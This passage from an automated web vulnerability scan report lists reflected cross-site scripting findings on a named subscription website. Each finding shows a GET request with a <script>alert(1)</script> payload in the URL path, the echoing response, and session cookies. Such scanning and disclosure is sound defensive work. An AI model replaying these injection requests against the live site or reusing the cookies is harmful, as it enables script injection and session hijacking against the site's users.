<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 is not found !</p>
...[SNIP]...

1.209. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3ee7<script>alert(1)</script>3a4ccd97f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:31 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 is not found !</p>
...[SNIP]...

1.210. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7d38<script>alert(1)</script>435d834ccc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a is not found !</p>
...[SNIP]...

1.211. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3dbd6<script>alert(1)</script>b142582d6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 815
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e is not found !</p>
...[SNIP]...

1.212. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edb49<script>alert(1)</script>7c6a1db1dd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:05 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc is not found !</p>
...[SNIP]...

1.213. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b9da<script>alert(1)</script>ebdba01c549 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:59 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 816
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549 is not found !</p>
...[SNIP]...

1.214. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4025e<script>alert(1)</script>69034f81869 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com is not found !</p>
...[SNIP]...

1.215. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c90b<script>alert(1)</script>453c69189e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 is not found !</p>
...[SNIP]...

1.216. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38595<script>alert(1)</script>7b1ed9f4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:29 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php is not found !</p>
...[SNIP]...

1.217. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bddaf<script>alert(1)</script>be5163b752c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c is not found !</p>
...[SNIP]...

1.218. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ed49<script>alert(1)</script>7bfcd9f6168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:07 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 is not found !</p>
...[SNIP]...

1.219. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 290be<script>alert(1)</script>d6a55c0227b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1 is not found !</p>
...[SNIP]...

1.220. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23203<script>alert(1)</script>15e2e16f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:34 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 814
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6 is not found !</p>
...[SNIP]...

1.221. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23019<script>alert(1)</script>5c03cda4908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php is not found !</p>
...[SNIP]...

1.222. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee8b8<script>alert(1)</script>15cf6cd2e68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
